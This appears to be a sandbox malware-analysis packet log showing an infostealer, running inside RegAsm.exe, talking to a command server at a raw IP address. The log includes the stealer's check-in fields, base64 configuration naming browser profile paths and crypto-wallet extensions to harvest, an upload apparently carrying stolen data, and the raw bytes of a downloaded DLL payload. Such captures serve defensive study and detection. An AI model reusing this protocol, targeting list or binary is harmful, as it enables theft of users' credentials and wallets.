                                                                                                                                                                                                                                        2024-09-21 12:49:44 UTC10062INData Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69
                                                                                                                                                                                                                                        Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
                                                                                                                                                                                                                                        2024-09-21 12:49:44 UTC10164INData Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45
                                                                                                                                                                                                                                        Data Ascii: mmunity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARE


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        35192.168.2.949792116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:45 UTC188OUTGET / HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:46 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        36192.168.2.949796116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:48 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDA
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:48 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 37 34 34 39 39 44 41 42 36 45 32 33 37 31 35 34 33 35 31 30 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d
                                                                                                                                                                                                                                        Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="hwid"7074499DAB6E2371543510-a33c7340-61ca------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------BKJDGCGDAAAKECAKKJDA--
                                                                                                                                                                                                                                        2024-09-21 12:49:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:48 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 3a1|1|1|1|52e5394e0ffaa1c51925944d53f55a57|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        37192.168.2.949799116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:50 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DGDHJEGIEBFHDGDGHDHI
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 48 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------DGDHJEGIEBFHDGDGHDHIContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------DGDHJEGIEBFHDGDGHDHICont
                                                                                                                                                                                                                                        2024-09-21 12:49:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:50 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:50 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        38192.168.2.949801116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:51 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGC
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:51 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------FCGIJDBAFCBAAKECGDGCCont
                                                                                                                                                                                                                                        2024-09-21 12:49:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:52 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:52 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                        Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        39192.168.2.949805116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:54 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJK
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 332
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:54 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 45 42 41 41 45 43 42 47 44 48 49 45 43 41 4b 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------KKJEBAAECBGDHIECAKJKContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------KKJEBAAECBGDHIECAKJKCont
                                                                                                                                                                                                                                        2024-09-21 12:49:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:55 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:49:55 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        40192.168.2.949812116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:49:59 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAA
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Content-Length: 6581
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:49:59 UTC6581OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 65 35 33 39 34 65 30 66 66 61 61 31 63 35 31 39 32 35 39 34 34 64 35 33 66 35 35 61 35 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 38 30 62 65 34 35 61 31 65 62 36 34 35 34 63 61 39 31 36 66 39 32 63 33 36 65 62 66 36 37 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                        Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"52e5394e0ffaa1c51925944d53f55a57------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="build_id"d80be45a1eb6454ca916f92c36ebf67d------HIDHIEGIIIECAKEBFBAACont
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:00 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        41192.168.2.949813116.203.165.1274431136C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC196OUTGET /sqlp.dll HTTP/1.1
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                        Host: 116.203.165.127
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC263INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:00 GMT
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        Content-Length: 2459136
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Last-Modified: Saturday, 21-Sep-2024 12:50:00 GMT
                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                                                                        Data Ascii: %:X~e!*FW|>|L1146
                                                                                                                                                                                                                                        2024-09-21 12:50:00 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                                                                                                                                                                        Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
